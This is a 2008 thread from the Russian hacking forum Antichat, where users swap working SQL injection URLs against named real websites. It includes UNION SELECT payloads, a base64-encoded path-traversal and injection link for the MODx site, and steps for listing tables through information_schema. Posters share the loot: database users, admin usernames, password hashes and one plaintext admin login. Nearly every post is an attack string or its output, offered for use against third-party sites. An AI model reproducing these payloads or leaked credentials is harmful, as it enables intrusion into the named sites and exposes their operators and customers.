ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.02.2008, 16:41
|
|
Новичок
Регистрация: 23.01.2008
Сообщений: 15
Провел на форуме:
20588
Репутация:
63
|
|
www.davisvisitor.com
_http://www.davisvisitor.com/additional.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5/*
4.0.16:dvb@localhost:dvb
Ни одной таблицы не смог подобрать. Если кто сможет-отпишите плз...
|
|
|
13.02.2008, 18:21
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
дерзаем
http://www.rugbysport.com/customer_testimonials.php?testimonial_id=7599999
/**/union/**/select/**/1,2,concat(customers_lastname,0x3a,customers_passw ord,%200x3a,customers_email_address),4,5,6,7,8/**/from/**/customers/*
Таблицы
counter
Последний раз редактировалось kair; 13.02.2008 в 18:34..
|
|
|
|
13.02.2008, 18:24
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
http://www.modxcms.com
Официальный сайт CMS MODx
Существует иньекция и возможность скачать любые файлы с сайта.
Пример ссылки:
Код:
http://www.modxcms.com/assets/snippets/repository/repo_download/download.php?dwnParam=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaG9tZS9odHRwZC92aG9zdHMvbW9keGNtcy5jb20vaHR0cGRvY3N8MTAzNyBBTkQgMT0xfHJlcG9fZGNvdW50fGluZGV4LnBocHxwYXNzd2Q
Для иньекции передаём строку кодированную в base64, приблизительно такого содержания:
1| 2|repo_dcount| 3|blabla.txt
1. - путь к файлу
2. - уязвимый параметр для SQLinj
3. - имя файла который хотим скачать
пример:
../../../../../../../../../../../../../../home/httpd/vhosts/modxcms.com/httpdocs|1037 AND 1=(select 1)|repo_dcount|index.php|passwd
--------------------------------------------------
не претиндую что первый, но нашёл 30 мин назад, хотел ставить себе эту CMS....
Последний раз редактировалось big_BRAT; 13.02.2008 в 18:26..
|
|
|
|
13.02.2008, 18:26
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://www.superchrono.com/index.php?main_page=customer_testimonials&testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
master@localhost:zenc:4.1.20
root:0015e5715c9d1718
vpopmail:1fbced3233935493
adminlink:186384a54d6ca922
master:5e80e4ce3bd7ea43
zic3cn:7231449d61b83801
zic2:7231449d61b83801
zicmasteruser:7231449d61b83801
Код:
http://store.workshopsupply.com/catalogue/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
workshop_admin@localhost:workshop_workshopsupply:5 .0.45-community-log
Код:
http://www.mrgadget.com.au/catalog/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7/*
mrgad@203.202.10.76:mrgad_db:4.1.22-standard-log
Код:
http://www.bodyguardforwomenhearts.com/store/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
bodyg_shop@localhost:bodyg_shop:4.1.22-standard-log
Код:
http://www.247av.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,3,4,5,6,7,8/*
kunal060912@localhost:247av_com_-_newosc:4.1.22-standard
Последний раз редактировалось BizzyD; 13.02.2008 в 18:29..
|
|
|
|
13.02.2008, 20:17
|
|
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
Провел на форуме:
1297994
Репутация:
237
|
|
Черт, народ, это ханипот чтоли?) Мне понравилась страница, выскакивающая при подставлении на сайте кавычки.
http://www.hauteecole.ru/ru/horses.php?sid=0&id=5
Но ссылка заинтересовала. Таки скуля? 
*ушла искать как обойти эту фильтрацию*)))
Последний раз редактировалось Digital Cat; 13.02.2008 в 20:33..
|
|
|
|
13.02.2008, 20:26
|
|
Познающий
Регистрация: 11.01.2008
Сообщений: 42
Провел на форуме:
95213
Репутация:
49
|
|
Код:
http://www.alparysoft.ru/products.php?id=10&item=14+union+select+1,2,3,4,5,6,7,8,9,10,version,12,13,14,15,16,17,18,19,20,21,22,23/*
|
|
|
|
14.02.2008, 00:22
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
[COLOR=White]http://galaxyit.ru/corp_systems/article_full.php?id=
4.1.22-standard/galaxyit_base/galaxyit_root@localhost
===================================
-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*
=====================================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.mediafetcher.com/article_full.php?id=
====================================
5.0.26-Debian_2-log/uselessj_uj2006/uselessj_ohshitw@uj4.uselessjunk.com
===================================
-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*
=====================================
админка matt::diabl0::4
(-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3A3a,fld_ username,fld_password,fld_id),9,10,11,12,13,14%20, 15,16,17,18,19,20,21,22,23+from+tbl_admin/*)
Последний раз редактировалось xcedz; 14.02.2008 в 17:02..
|
|
|
|
14.02.2008, 03:06
|
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333
Репутация:
1564
|
|
2xcedz если мускул >= 5 то можно работать через information_schema
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+0,1/*
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+1,1/*
http://www.uselessjunk.com/article_full.php?id=99999+union+select+1,2,3,4,5,t able_name ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+f rom+information_schema.tables+limit+2,1/*
итд... потом таким же образом вытаскиваеш названия колонок (column_name) |
|
|
|
14.02.2008, 10:46
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Код:
http://www.celadon-international.com/place.php?id=-1+union+select+1/*
http://www.travel-to-peloponese.com/place.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17/*
|
|
|
|
14.02.2008, 13:51
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
2xcedz and 2Mobile
Вы тему смотрите вообще? 0_o
На предидущей странице db_reader уже нашёл эту уязвимость и повыводил админов! Зачем боянить? Ладно б страницы 3 назад, так всего пару постов...
___________________________
Added:
Чтобы в тему:
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-125823+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,n ame,pwd,userid),8,9,10,11,12,13,14,15/*
Ну и лимитом выводим..
Последний раз редактировалось ThreeD; 14.02.2008 в 13:58..
|
|
|
|
|
|
|
|
Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
|
|
|
|
Похожие темы
Линейный вид
